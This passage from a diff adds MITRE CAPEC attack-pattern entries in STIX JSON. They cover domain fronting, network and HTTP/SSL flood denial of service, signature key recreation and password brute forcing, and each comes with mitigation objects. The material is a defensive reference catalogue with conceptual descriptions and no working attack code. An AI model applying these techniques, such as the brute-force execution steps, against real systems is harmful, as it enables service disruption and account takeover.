routed using a CDN, and that both of the contradictory domains are served from that CDN.", + "If the purpose of the Domain Fronting is to hide redirected C2 traffic, the C2 server must have been created in the CDN." + ], + "x_capec_skills_required": { + "Medium": "The adversary must have some knowledge of how messages are routed." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor connections, checking headers in traffic for contradictory domain names, or empty domain names.", + "id": "course-of-action--2769b76e-88f2-4e7c-9ebb-32ab919d5fee", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-481-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--32b657af-ab17-46cd-9717-b3b289f2f295", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2769b76e-88f2-4e7c-9ebb-32ab919d5fee", + "target_ref": "attack-pattern--4733a63a-db36-49fa-8eba-3d5eddfe7f87", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a flooding attack using the TCP protocol with the intent to deny legitimate users access to a service. These attacks exploit the weakness within the TCP protocol where there is some state information for the connection the server needs to maintain. 
This often involves the use of TCP SYN messages.", + "external_references": [ + { + "external_id": "CAPEC-482", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/482.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Network Denial of Service: Direct Network Flood", + "external_id": "T1498.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1498/001" + }, + { + "description": "Endpoint Denial of Service: OS Exhaustion Flood", + "external_id": "T1499.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/001" + }, + { + "description": "Endpoint Denial of Service: Service Exhaustion Flood", + "external_id": "T1499.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/002" + } + ], + "id": "attack-pattern--172e2289-333b-4796-9afd-94140c9480e8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "TCP Flood", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the ability to generate a large amount of TCP traffic to send to the target port of a functioning server." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, an organization can monitor incoming packets and look for patterns in the TCP traffic to determine if the network is under an attack. 
The potential target may implement a rate limit on TCP SYN messages which would provide limited capabilities while under attack.", + "id": "course-of-action--9ba2ccdc-749a-40ac-94fe-dd01b63d365b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-482-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--927e4fec-c04f-40f4-becb-c817045ecf24", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ba2ccdc-749a-40ac-94fe-dd01b63d365b", + "target_ref": "attack-pattern--172e2289-333b-4796-9afd-94140c9480e8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it a generalization of CAPEC-230: XML Nested Payloads and CAPEC-231: XML Oversized Payloads. 
Please refer to these CAPECs going forward.", + "external_references": [ + { + "external_id": "CAPEC-484", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/484.html" + } + ], + "id": "attack-pattern--59a00678-cf9d-461d-91b6-bfa53fd4f0bb", + "modified": "2019-09-30T00:00:00.000Z", + "name": "DEPRECATED: XML Client-Side Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker obtains an authoritative or reputable signer's private signature key by exploiting a cryptographic weakness in the signature algorithm or pseudorandom number generation and then uses this key to forge signatures from the original signer to mislead a victim into performing actions that benefit the attacker.", + "external_references": [ + { + "external_id": "CAPEC-485", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/485.html" + }, + { + "external_id": "CWE-330", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/330.html" + }, + { + "description": "Unsecure Credentials: Private Keys", + "external_id": "T1552.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/004" + }, + { + "description": "P.J. Leadbitter, D. Page, N.P. 
Smart, Attacking DSA Under a Repeated Bits Assumption, 2004--07, http://www.iacr.org/archive/ches2004/31560428/31560428.pdf", + "external_id": "REF-419", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Debian Security, DSA-1571-1 openssl -- predictable random number generator, 2008--05---13, http://www.debian.org/security/2008/dsa-1571", + "external_id": "REF-420", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--5b01885b-ebb8-4b72-8314-6fb4729eda47", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Signature Spoofing by Key Recreation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An authoritative signer is using a weak method of random number generation or weak signing software that causes key leakage or permits key inference.", + "An authoritative signer is using a signature algorithm with a direct weakness or with poorly chosen parameters that enable the key to be recovered using signatures from that signer." + ], + "x_capec_skills_required": { + "High": "Ability to create malformed data blobs and know how to present them directly or indirectly to a victim." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure cryptographic elements have been sufficiently tested for weaknesses.", + "id": "course-of-action--7bbe40a9-49b0-4520-838f-075ba95e1ab6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-485-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--42e7e94d-1991-4bfc-ae5f-1379eb9e797a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7bbe40a9-49b0-4520-838f-075ba95e1ab6", + "target_ref": "attack-pattern--5b01885b-ebb8-4b72-8314-6fb4729eda47", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a flooding attack using the UDP protocol with the intent to deny legitimate users access to a service by consuming the available network bandwidth. Additionally, firewalls often open a port for each UDP connection destined for a service with an open UDP port, meaning the firewalls in essence save the connection state thus the high packet nature of a UDP flood can also overwhelm resources allocated to the firewall. UDP attacks can also target services like DNS or VoIP which utilize these protocols. 
Additionally, due to the session-less nature of the UDP protocol, the source of a packet is easily spoofed making it difficult to find the source of the attack.", + "external_references": [ + { + "external_id": "CAPEC-486", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/486.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + } + ], + "id": "attack-pattern--bb4d350b-c500-45d6-97c2-c0adccbe6bad", + "modified": "2022-09-29T00:00:00.000Z", + "name": "UDP Flood", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the ability to generate a large amount of UDP traffic to send to the desired port of a target service using UDP." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, modern firewalls drop UDP traffic destined for closed ports, and unsolicited UDP reply packets. 
A variety of other countermeasures such as universal reverse path forwarding and remote triggered black holing(RFC3704) along with modifications to BGP like black hole routing and sinkhole routing(RFC3882) help mitigate the spoofed source IP nature of these attacks.", + "id": "course-of-action--7547eca0-e697-4517-a5ea-a7cf9a8da506", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-486-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d51664cd-4d4a-4d9d-a633-187820aacb6a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7547eca0-e697-4517-a5ea-a7cf9a8da506", + "target_ref": "attack-pattern--bb4d350b-c500-45d6-97c2-c0adccbe6bad", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a flooding attack using the ICMP protocol with the intent to deny legitimate users access to a service by consuming the available network bandwidth. A typical attack involves a victim server receiving ICMP packets at a high rate from a wide range of source addresses. 
Additionally, due to the session-less nature of the ICMP protocol, the source of a packet is easily spoofed making it difficult to find the source of the attack.", + "external_references": [ + { + "external_id": "CAPEC-487", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/487.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + } + ], + "id": "attack-pattern--2e017307-7bab-419b-972c-8dae9e089572", + "modified": "2022-09-29T00:00:00.000Z", + "name": "ICMP Flood", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the ability to generate a large amount of ICMP traffic to send to the target server." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, an organization can enable ingress filtering. 
Additionally modifications to BGP like black hole routing and sinkhole routing(RFC3882) help mitigate the spoofed source IP nature of these attacks.", + "id": "course-of-action--fb127f46-6f57-4569-b6c8-e5ae71cdaee4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-487-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aec19b04-5aac-4130-b0dc-e5bb2841bab7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fb127f46-6f57-4569-b6c8-e5ae71cdaee4", + "target_ref": "attack-pattern--2e017307-7bab-419b-972c-8dae9e089572", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a flooding attack using the HTTP protocol with the intent to deny legitimate users access to a service by consuming resources at the application layer such as web services and their infrastructure. These attacks use legitimate session-based HTTP GET requests designed to consume large amounts of a server's resources. 
Since these are legitimate sessions this attack is very difficult to detect.", + "external_references": [ + { + "external_id": "CAPEC-488", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/488.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Endpoint Denial of Service:Service Exhaustion Flood", + "external_id": "T1499.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/002" + }, + { + "description": "HTTP Flood Attack", + "external_id": "REF-751", + "source_name": "reference_from_CAPEC", + "url": "https://www.cloudflare.com/learning/ddos/http-flood-ddos-attack/" + } + ], + "id": "attack-pattern--d43c7ffa-16a5-4eb9-8c29-3391cc7ff269", + "modified": "2023-01-24T00:00:00.000Z", + "name": "HTTP Flood", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the ability to generate a large amount of HTTP traffic to send to a target server." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use a Web Application Firewall (WAF) to help filter out malicious traffic. This can be setup with rules to block IP addresses found in IP reputation databases, which contains lists of known bad IP addresses. Analysts should also monitor when the traffic flow becomes abnormally large, and be able to add on-the-fly rules to block malicious traffic. 
Special care should be taken to ensure low false positive rates in block rules and functionality should be implemented to allow a legitimate user to resume sending traffic if they have been blocked.", + "id": "course-of-action--91772dc5-fe8a-4269-bfa0-671a24b28802", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-488-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2df5c397-b1c2-490a-a993-838b4e8133e2", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--91772dc5-fe8a-4269-bfa0-671a24b28802", + "target_ref": "attack-pattern--d43c7ffa-16a5-4eb9-8c29-3391cc7ff269", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Hire a third party provider to implement a Web Application Firewall (WAF) for your application. 
Third party providers have dedicated resources and expertise that could allow them to update rules and prevent HTTP Floods very quickly.", + "id": "course-of-action--f0c4e955-f793-4d04-8e9d-01df99203e2c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-488-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c6b16353-b7d5-4409-ba94-29ac4ce19d53", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f0c4e955-f793-4d04-8e9d-01df99203e2c", + "target_ref": "attack-pattern--d43c7ffa-16a5-4eb9-8c29-3391cc7ff269", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use a load balancer such as nginx to prevent small scale HTTP Floods by dispersing traffic between a group of servers.", + "id": "course-of-action--bd3779cc-34f7-46d6-9bcc-b1e3033b6a6c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-488-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0e03bb28-5d04-4d80-bdde-2dfb7c21ebf1", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bd3779cc-34f7-46d6-9bcc-b1e3033b6a6c", + "target_ref": 
"attack-pattern--d43c7ffa-16a5-4eb9-8c29-3391cc7ff269", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Make a requesting machine solve some kind of challenge before allowing them to send an HTTP request. This could be a captcha or something similar that works to deter bots.", + "id": "course-of-action--389ae813-989b-4b94-97f0-c8af9ebdbb16", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-488-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3b18f53c-3cc4-414f-aee4-c0537c3b432f", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--389ae813-989b-4b94-97f0-c8af9ebdbb16", + "target_ref": "attack-pattern--d43c7ffa-16a5-4eb9-8c29-3391cc7ff269", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a flooding attack using the SSL protocol with the intent to deny legitimate users access to a service by consuming all the available resources on the server side. These attacks take advantage of the asymmetric relationship between the processing power used by the client and the processing power used by the server to create a secure connection. In this manner the attacker can make a large number of HTTPS requests on a low provisioned machine to tie up a disproportionately large number of resources on the server. 
The clients then continue to keep renegotiating the SSL connection. When multiplied by a large number of attacking machines, this attack can result in a crash or loss of service to legitimate users.", + "external_references": [ + { + "external_id": "CAPEC-489", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/489.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Endpoint Denial of Service:Service Exhaustion Flood", + "external_id": "T1499.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/002" + } + ], + "id": "attack-pattern--f30a7c37-4d87-41d2-a103-c995948076f3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "SSL Flood", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the ability to generate a large amount of SSL traffic to send a target server." 
+ ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, an organization can create rule based filters to silently drop connections if too many are attempted in a certain time period.", + "id": "course-of-action--6d85f1a8-2ea9-4b71-946c-770993335e06", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-489-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--63e515c5-ea52-4e4c-947f-ddf3f6b91725", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6d85f1a8-2ea9-4b71-946c-770993335e06", + "target_ref": "attack-pattern--f30a7c37-4d87-41d2-a103-c995948076f3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary tries every possible value for a password until they succeed. A brute force attack, if feasible computationally, will always be successful because it will essentially go through all possible passwords given the alphabet used (lower case letters, upper case letters, numbers, symbols, etc.) 
and the maximum length of the password.", + "external_references": [ + { + "external_id": "CAPEC-49", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/49.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-257", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/257.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "description": "Brute Force:Password Guessing", + "external_id": "T1110.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1110/001" + } + ], + "id": "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Password Brute Forcing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + 
"attack-pattern--7b423196-9de6-400f-91de-a1f26b3f19f1" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A system does not enforce a strong password policy and the user picks a five letter password consisting of lower case English letters only. The system does not implement any password throttling mechanism. Assuming the adversary does not know the length of the users' password, an adversary can brute force this password in maximum 1+26+26^2+26^3+26^4+26^5 = 1 + 26 + 676 + 17576 + 456976 + 11,881,376 = 12,356,631 attempts, and half these tries (6,178,316) on average. Using modern hardware this attack is trivial. If the adversary were to assume that the user password could also contain upper case letters (and it was case sensitive) and/or numbers, than the number of trials would have been larger.\n An adversary's job would have most likely been even easier because many users who choose easy to brute force passwords like this are also likely to use a word that can be found in the dictionary. Since there are far fewer valid English words containing up to five letters than 12,356,631, an attack that tries each of the entries in the English dictionary would go even faster.\n ", + "A weakness exists in the automatic password generation routine of Mailman prior to 2.1.5 that causes only about five million different passwords to be generated. This makes it easy to brute force the password for all users who decided to let Mailman automatically generate their passwords for them. Users who chose their own passwords during the sign up process would not have been affected (assuming that they chose strong passwords). See also: CVE-2004-1143" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine application's/system's password policy: Determine the password policies of the target application/system.

  2. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc.).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks).

Exploit

  1. Brute force password: Given the finite space of possible passwords dictated by the password policy determined in the previous step, try all possible passwords for a known user ID until application/system grants access.

  2. Techniques
    Manually or automatically enter all possible passwords through the application/system's interface. In most systems, start with the shortest and simplest possible passwords, because most users tend to select such passwords if allowed to do so.
    Perform an offline dictionary attack or a rainbow table attack against a known password hash.
", + "x_capec_extended_description": "\n A system will be particularly vulnerable to this type of an attack if it does not have a proper enforcement mechanism in place to ensure that passwords selected by users are strong passwords that comply with an adequate password policy. In practice a pure brute force attack on passwords is rarely used, unless the password is suspected to be weak. Other password cracking methods exist that are far more effective (e.g. dictionary attacks, rainbow tables, etc.). Knowing the password policy on the system can make a brute force attack more efficient. For instance, if the policy states that all passwords must be of a certain level, there is no need to check smaller candidates.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170" + ], + "x_capec_prerequisites": [ + "An adversary needs to know a username to target.", + "The system uses password based authentication as the one factor authentication mechanism.", + "An application does not have a password throttling mechanism in place. A good password throttling mechanism will make it almost impossible computationally to brute force a password as it may either lock out the user after a certain number of incorrect attempts or introduce time out periods. Both of these would make a brute force attack impractical." + ], + "x_capec_resources_required": [ + "A powerful enough computer for the job with sufficient CPU, RAM and HD. Exact requirements will depend on the size of the brute force job and the time requirement for completion. Some brute forcing jobs may require grid or distributed computing (e.g. DES Challenge)." + ], + "x_capec_skills_required": { + "Low": "A brute force attack is very straightforward. 
A variety of password cracking tools are widely available." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement a password throttling mechanism. This mechanism should take into account both the IP address and the log in name of the user.", + "id": "course-of-action--1260aa3b-67cb-4194-9b7c-1edcd9cea382", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-49-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a2efb506-562c-41e5-afef-c5f89f5bf4ab", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1260aa3b-67cb-4194-9b7c-1edcd9cea382", + 